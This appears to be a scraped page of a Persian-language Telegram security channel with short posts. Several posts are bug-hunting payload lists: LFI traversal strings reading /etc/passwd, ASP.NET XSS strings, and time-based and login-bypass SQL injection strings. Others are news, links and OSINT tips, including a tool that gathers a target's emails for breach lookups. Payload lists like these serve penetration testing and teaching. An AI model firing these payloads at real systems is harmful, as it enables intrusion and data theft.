Source Byte
رفتن به کانال در Telegram
هشیار کسی باید کز عشق بپرهیزد وین طبع که من دارم با عقل نیامیزد Saadi Shirazi 187
نمایش بیشتر8 321
مشترکین
اطلاعاتی وجود ندارد24 ساعت
-17 روز
-4730 روز
آرشیو پست ها
8 321
سرویس SocialPwned به شما امکان میدهد ایمیلهایی را از هدف دریافت کنید که در شبکههای اجتماعی مانند اینستاگرام، لینکدین و توییتر منتشر شدهاند تا نشتهای احتمالی را در PwnDB یا Dehashed پیدا کنید و اطلاعات حساب Google را از طریق GHunt به دست آورید.
8 321
Converting LFI into RCE by chaining PHP encoding filters
https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html
8 321
$10,000 From GitHub For Bypassing Filtration oF HTML tags
https://infosecwriteups.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37
8 321
Some filter bypass payload list while hunting for LFi vulnerability
→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd
→index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
8 321
XSS payloads for http://ASP.NET endpoints:
/(A('onerror=%22alert%601%60%22testabcd))/
/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders
(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f
For more ➡️ http://blog.isec.pl/all-is-xss-that-comes-to-the-net/
8 321
Add to your list SQL injection payload 🥶
1%27//%256fR//50%2521%253D22%253B%2523
==
"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
===
query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
==
' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
8 321
Repost from مگاهرتز :: روزنامهنویس
حباب اطلاعاتی چیست؟
چگونه میتوان از آن خارج شد؟
منبع: dw_persian
8 321
The source code of Intel Alder Lake processors has appeared on the web.
Intel has confirmed that some of the source code and internal documentation for Alder Lake has been leaked and clarified that the data from this leak, which has been published in public sources, is genuine.
8 321
سیم سوآپ یا سیم کارت هایجکینگ چیست؟
https://youtu.be/DGJqmKfRulU
داوود سجادی دکترای علم کامپیوتر ✍
8 321
JSON Crack is a tool that generates graph diagrams from JSON objects
https://github.com/AykutSarac/jsoncrack.com
8 321
param=' or 1=1#
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1
This is the most classic, standard first test:
' or '1'='1
Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
Part 2 🥶
8 321
Login Bypass 🌵
#SQLi
param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#
Part 1🥶
8 321
یک متخصص #اوسینت یا کارگاه وب وقتی به یک عکس یا ویدئو برخورد می کند برای رسیدن به سر نخ ها این موارد را بررسی می کند:
Original Photo taken from Camera?
is copyrighted?
Has authoring Information?
Contains comments / descriptions?
Contains tracking?
Contains faces?
Contains text?
Contains location detalls?
Contains steganography?
Contains digital watermarks?
Contains date/time details?
Has maker note content?
Contains camera device Information?
Has thumbnail(s)?
Contains unreadable metadata?
Traling data appended to photo?
Contains metadata?
